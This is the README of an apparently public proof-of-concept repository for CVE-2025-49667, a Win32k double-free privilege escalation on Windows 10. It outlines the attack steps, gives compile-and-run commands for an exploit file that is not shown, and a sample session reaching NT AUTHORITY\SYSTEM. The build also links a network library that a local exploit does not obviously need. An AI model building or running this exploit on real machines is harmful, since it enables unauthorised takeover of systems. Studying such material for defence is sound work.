# CVE-2025-49667 — Win32k Privilege Escalation Exploit  
![Exploit Status](https://img.shields.io/badge/status-PoC-orange)  
✔ Tested: Windows 10  
✘ Not Working: Windows 11  

---

## 🧭 Table of Contents
1. [Vulnerability Details](#vulnerability-details)  
2. [Affected Systems](#affected-systems)  
3. [Exploit Workflow](#exploit-workflow)  
4. [Compilation Instructions](#compilation-instructions)  
5. [Exploit Output Example](#exploit-output-example)  
6. [Exploit Flow Diagram](#exploit-flow-diagram)  
7. [Notes](#notes)  
8. [Disclaimer](#disclaimer)  

---

## 🔥 Vulnerability Details
- **CVE ID**: [CVE-2025-49667](https://nvd.nist.gov/vuln/detail/CVE-2025-49667) | [MITRE](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-49667)  
- **Type**: Double Free (CWE-415)  
- **Component**: Windows Win32 Kernel Subsystem (win32k.sys)  
- **Impact**: Local Privilege Escalation (LPE → SYSTEM)  
- **CVSS Score**: 7.8 (High)  
- **Attack Vector**: Local, low-complexity exploit  

---

## 💻 Affected Systems
- ✔ Windows 10 (1909 → 22H2)  
- ✘ Windows 11 (patched by default)  
- ✘ Windows Server (partially mitigated)  

---

## ⚡ Exploit Workflow
1. Trigger vulnerable syscall in `win32k.sys`.  
2. Force a **double free** on kernel memory object.  
3. Reallocate freed memory with controlled data.  
4. Overwrite kernel function pointer.  
5. Escalate to **NT AUTHORITY\SYSTEM**.  

---

## 🛠 Compilation Instructions
- with Visual Studio Command Prompt:
```
cl.exe /EHsc /O2 /std:c++17 /DWIN32 /D_WINDOWS /DNDEBUG exploit.cpp /link ntdll.lib winhttp.lib psapi.lib kernel32.lib user32.lib gdi32.lib winspool.lib comdlg32.lib advapi32.lib shell32.lib ole32.lib oleaut32.lib uuid.lib odbc32.lib odbccp32.lib /MACHINE:X64 /SUBSYSTEM:CONSOLE
```
- with MinGW-w64:
```
g++ -O2 -std=c++17 -m64 -DWIN32 -D_WINDOWS -DNDEBUG -o exploit.exe exploit.cpp -lntdll -lwinhttp -lpsapi -lkernel32 -luser32 -lgdi32 -lwinspool -lcomdlg32 -ladvapi32 -lshell32 -lole32 -loleaut32 -luuid -lodbc32 -lodbccp32
```
- Run with:
```
exploit.exe
```
## 📟 Exploit Output Example
```
C:\Users\yuri08> whoami
yuri08

C:\Users\yuri08> exploit.exe
[*] Triggering double free...
[*] Overwriting function pointer...
[*] Gaining SYSTEM privileges...
[+] Exploit successful!

C:\Windows\system32> whoami
nt authority\system

```
## 📜Exploit Flow Diagram
```
+-----------------------+
| Userland Process      |
+----------+------------+
           |
           v
+-----------------------+
| Call vulnerable API   |
| (win32k.sys)          |
+----------+------------+
           |
   Double Free Trigger
           |
           v
+-----------------------+
| Kernel Object Freed   |
+----------+------------+
           |
   Fake Object Spray
           |
           v
+-----------------------+
| Overwrite Func Ptr    |
+----------+------------+
           |
   SYSTEM Privileges
           |
           v
+-----------------------+
| NT AUTHORITY\SYSTEM   |
+-----------------------+

```
## 📝 Notes

- Requires local access (no remote vector).

- Works reliably on Windows 10 pre-patch.

- May cause BSOD if heap spray fails.

- Debug with WinDbg: !analyze -v

## ⚠ Disclaimer

- This exploit code and documentation are provided strictly for educational and research purposes only.
- Do not use on systems without explicit authorization.
- You are fully responsible for your actions.

>🕶 Stay safe, hack the planet responsibly.
